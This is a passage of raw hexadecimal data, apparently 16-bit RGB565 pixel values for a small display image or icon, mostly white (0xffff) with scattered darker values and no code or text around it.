0xf7ff, 0xffff, 0xffdd, 0xffff, 0xcfff, 0x23d5, 0x3c76, 0xd7ff, 0xfffe, 0xffde, 0xffdf, 0xf7ff, 0xf7ff, 0xcf5e, 0x0a2e, 0x2bf9, 0xfffd, 0xbefe, 0x09f0, 0x1a52, 0x6434, 0xf7ff, 0xc71d, 0x09ed, 0x1291, 0x6457, 0xf7ff, 0x9db9, 0x124e, 0x0a2f, 0x7cd7, 0xffdf, 0x967f, 0x122e, 0x6433, 0xdfff, 0x9e7f, 0x120f, 0x7cb7, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xefff, 0x961b, 0x1b52, 0x6e3e, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffbe, 0xffbd, 0xefff, 0x7e5d, 0x6518, 0xf7ff, 0xffde, 0xfffd, 0xffff, 0xffdf, 0xffbf, 0xffdf, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffbe, 0xffff, 0xefff, 0x95fa, 0x2331, 0x7e7f, 0xe7ff, 0xffff, 0xffbf, 0xf7bd, 0xefff, 0x9e1a, 0x120f, 0x1ad5, 0x1b77, 0x0b56, 0x02d4, 0x1b56, 0x0b14, 0x1396, 0x0b57, 0x135a, 0x0a50, 0xc79f, 0xe7ff, 0x4bf4, 0x12f5, 0x02f8, 0x1358, 0x0b97, 0x0b98, 0x0336, 0x12b1, 0xe7ff, 0xefff, 0x7517, 0x0a72, 0x1b79, 0x122e, 0xbf1f, 0xf7ff, 0xfffc, 0xfffb, 0xc7ff, 0x2c9a, 0x23d7, 0xd7df, 0xfffe, 0xffde, 0xf7ff, 0xf7ff, 0xfffe, 0xfffe, 0xffff,
0xffff, 0xfffe, 0xffde, 0xf7ff, 0xc7ff, 0x23d5, 0x3c96, 0xd7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xcf7e, 0x124e, 0x33f9, 0xfffd, 0xdf5e, 0x53b3, 0x6456, 0x8516, 0xefff, 0xcefc, 0x53b2, 0x53d4, 0x9579, 0xf7ff, 0xbebb, 0x5c32, 0x5413, 0xadf9, 0xffdf, 0x96bf, 0x1a2e, 0x6c33, 0xe7ff, 0x967f, 0x0a2f, 0x74d6, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xf7ff, 0x9e1b, 0x1310, 0x6e7e, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7bf, 0xffbe, 0xff9d, 0xefff, 0x861d, 0x64f8, 0xf7ff, 0xfffd, 0xfffd, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffbf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffdf, 0xf7ff, 0xefff, 0x961a, 0x1b11, 0x7e9f, 0xe7ff, 0xf7df, 0xffbf, 0xfffe, 0xc699, 0x224a, 0x4373, 0x3b13, 0x3b53, 0x3b93, 0x3b93, 0x3352, 0x3392, 0x2374, 0x1b58, 0x0299, 0x6c33, 0xdfff, 0xb77f, 0x0ab2, 0x0af7, 0x137a, 0x0b38, 0x02b5, 0x1336, 0x1b14, 0x3b33, 0xefff, 0xffff, 0xf7ff, 0x2b12, 0x0ad6, 0x12b2, 0x5c99, 0xf7ff, 0xffbc, 0xfffc, 0xcfff, 0x34da, 0x13b6, 0xd7df, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xffde, 0xfffe, 0xffff,
0xffff, 0xfffe, 0xffdd, 0xf7ff, 0xc7ff, 0x23f6, 0x3c55, 0xd7ff, 0xf7ff, 0xffde, 0xffdf, 0xffff, 0xf7ff, 0xcf7f, 0x124e, 0x3bf8, 0xfffe, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xf7ff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xe7ff, 0xefff, 0xf7ff, 0xffbe, 0x9edf, 0x1a2d, 0x6c13, 0xe7ff, 0x969f, 0x0a2f, 0x74d6, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xf7df, 0xf7ff, 0x95fb, 0x1311, 0x76bf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xefff, 0xffdd, 0xffdd, 0xefff, 0x861d, 0x6d19, 0xefff, 0xffdd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xe7ff, 0x965b, 0x2352, 0x6e3f, 0xefff, 0xf7bf, 0xffff, 0xf7be, 0xeffe, 0xefff, 0xefff, 0xefff, 0xe7ff, 0xe7ff, 0xefff, 0xe7ff, 0xdfff, 0x759c, 0x0ab5, 0x0278, 0xc677, 0xe7ff, 0x651a, 0x02f5, 0x1399, 0x0b17, 0x12f5, 0x655d, 0x12b3, 0x1ab2, 0x6c97, 0xffff, 0xffbf, 0xffdf, 0x9e1d, 0x12d2, 0x1358, 0x2315, 0xefff, 0xffbc, 0xfffd, 0xd7ff, 0x1c37, 0x2458, 0xcfff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff,
0xffdf, 0xfffe, 0xffdd, 0xf7ff, 0xd7ff, 0x3c37, 0x23d5, 0xc7ff, 0xf7ff, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xcf3f, 0x122e, 0x33f8, 0xf7ff, 0xd77f, 0x959c, 0x95bc, 0xb65b, 0xf7ff, 0xdf3e, 0x9d7a, 0x957b, 0xbe9d, 0xf7ff, 0xd75f, 0x95bb, 0x8d9c, 0xc6de, 0xffff, 0x9edf, 0x1a0c, 0x6c14, 0xdfff, 0x967f, 0x0230, 0x6cf7, 0xefff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xefff, 0x7559, 0x1b32, 0x96ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe7ff, 0xf7fd, 0xf7dd, 0xefff, 0x85da, 0x5c74, 0xf7ff, 0xfffe, 0xffde, 0xffff, 0xf7ff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffdd, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0xaedd, 0x1b73, 0x4d9f, 0xf7ff, 0xf7df, 0xffff, 0xf7ff, 0xf7fe, 0xf7de, 0xffbf, 0xffff, 0xf7ff, 0xefff, 0xf7fe, 0xf7ff, 0xdfff, 0x0a51, 0x12f6, 0x0297, 0xfffd, 0xefff, 0x3312, 0x0b38, 0x0359, 0x1356, 0x3332, 0xdfff, 0x74fa, 0x01ed, 0xb6bd, 0xffff, 0xff9f, 0xffff, 0xdfff, 0x1aae, 0x0319, 0x12b4, 0xe7df, 0xffdd, 0xffde, 0xc7df, 0x13f7, 0x2c97, 0xd7ff, 0xfffd, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffdf, 0xffff, 0xfffd, 0xfffe, 0xe7ff, 0x54d9, 0x1375, 0xaf7f, 0xf7ff, 0xfffc, 0xfffd, 0xffff, 0xffff, 0xd73f, 0x122e, 0x2c19, 0xf7ff, 0xb6be, 0x01b0, 0x1211, 0x5bd3, 0xf7ff, 0xbe9d, 0x11ad, 0x11cf, 0x6434, 0xefff, 0x95ba, 0x09cf, 0x01d1, 0x6cb7, 0xffff, 0xa6bf, 0x11ec, 0x6435, 0xdfff, 0x9e7f, 0x0a30, 0x6cf8, 0xefff, 0xffff, 0xffde, 0xffde, 0xf7ff, 0xdfff, 0x4c76, 0x2312, 0xbfbf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffde, 0xf7ff, 0xf7dd, 0xfffe, 0xf7ff, 0xc73d, 0xb6fb, 0xefff, 0xffff, 0xfffe, 0xfffe, 0xf7fe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffde, 0xffde, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xcfbf, 0x1352, 0x2cfc, 0xefff, 0xf7ff, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xff9e, 0xf7ff, 0xf7ff, 0xf7fe, 0xefff, 0x8ddd, 0x0273, 0x1b36, 0x2356, 0xf7fd, 0xe7be, 0x2ab0, 0x1338, 0x039a, 0x0251, 0x9d99, 0xffff, 0xc73e, 0x330e, 0xefff, 0xfffe, 0xffdf, 0xf7df, 0xefff, 0x5412, 0x0319, 0x0273, 0xd77f, 0xffdf, 0xffff, 0xaf5f, 0x13f7, 0x44d8, 0xe7ff, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff,
0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xf7ff, 0x85fc, 0x0b76, 0x7e5f, 0xefff, 0xffdc, 0xffdd, 0xffff, 0xffff, 0xd73e, 0x122e, 0x2c3b, 0xf7ff, 0xb6bf, 0x01d0, 0x09f0, 0x5c14, 0xf7ff, 0xbebe, 0x09ce, 0x0a10, 0x6c76, 0xf7ff, 0x9dda, 0x0a10, 0x01f1, 0x74b7, 0xffff, 0xa6bf, 0x120d, 0x6435, 0xdfff, 0x9e7f, 0x0a0f, 0x6cf8, 0xefff, 0xffff, 0xffbe, 0xffbe, 0xf7ff, 0xbfdf, 0x2bd3, 0x33b4, 0xdfff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffdf, 0xffbf, 0xf79e, 0xf7ff, 0xf7ff, 0xefff, 0xffff, 0xfffe, 0xfffd, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffde, 0xffde, 0xffde, 0xffde, 0xfffd, 0xfffd, 0xfffd, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xe7ff, 0x23d4, 0x1459, 0xcf9f, 0xf7ff, 0xffde, 0xffbe, 0xffff, 0xf7de, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xe7ff, 0x2355, 0x1378, 0x0291, 0x6496, 0xf7ff, 0xe7df, 0x1a70, 0x0b38, 0x0b39, 0x22f3, 0xf7ff, 0xfffd, 0xe79d, 0xd79d, 0xf7ff, 0xffdd, 0xffbe, 0xf7df, 0xefff, 0x7473, 0x02f7, 0x0ab3, 0xcf5f, 0xffdf, 0xf7ff, 0x863c, 0x0b33, 0x7e5e, 0xf7ff, 0xffdd, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xefff,
0xfffe, 0xefff, 0xf7ff, 0xffde, 0xffff, 0xb73f, 0x0375, 0x3cf9, 0xefff, 0xffbd, 0xffde, 0xf7ff, 0xefff, 0xcf3e, 0x122e, 0x2bfb, 0xf7ff, 0xe7bf, 0xae5e, 0xae5e, 0xcf1f, 0xf7ff, 0xdf7f, 0xae7e, 0xa65f, 0xc71f, 0xf7ff, 0xdf7f, 0xa65d, 0xa65e, 0xcf1e, 0xffff, 0x9e9f, 0x11ed, 0x6434, 0xe7ff, 0x9e7f, 0x09ee, 0x74f7, 0xe7ff, 0xf7ff, 0xff9e, 0xffdf, 0xefff, 0x8ebe, 0x1393, 0x5cf8, 0xefff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xf79f, 0xffdf, 0xffff, 0xf7ff, 0xefff, 0xf7ff, 0xffdf, 0xffdf, 0xfffe, 0xfffe, 0xffdf, 0xffbf, 0xffbf, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xfffe, 0xf7fe, 0xf7ff, 0xe7ff, 0xcf3f, 0xb69d, 0xbedd, 0xd77f, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffdd, 0xffdd, 0xffde, 0xffdf, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffde, 0xefff, 0x54f8, 0x03b6, 0xa6bc, 0xefff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffde, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xae7e, 0x0294, 0x02f6, 0x43d4, 0xf7ff, 0xffff, 0xdfff, 0x12b4, 0x0b18, 0x0af5, 0x6cd8, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffbe, 0xffdf, 0xffff, 0xf7ff, 0x6c73, 0x02d5, 0x0a71, 0xdfdf, 0xf7ff, 0xefff, 0x5495, 0x1b54, 0xaf3f, 0xf7ff, 0xffdd, 0xffde, 0xffdf, 0xffdf, 0xfffe, 0xffff, 0xf7ff,
0xfffd, 0xefff, 0xefff, 0xffff, 0xfffe, 0xdfff, 0x1c16, 0x13b5, 0xcf9f, 0xffbf, 0xffbf, 0xf7ff, 0xefff, 0xcf5e, 0x124f, 0x3c1b, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xefbf, 0xffff, 0xf7ff, 0xefff, 0xf7ff, 0xffff, 0x9ebf, 0x120f, 0x6434, 0xe7ff, 0xa67f, 0x11ed, 0x74d7, 0xe7ff, 0xf7ff, 0xffbf, 0xffdf, 0xe7ff, 0x44f8, 0x13d5, 0x8e5d, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 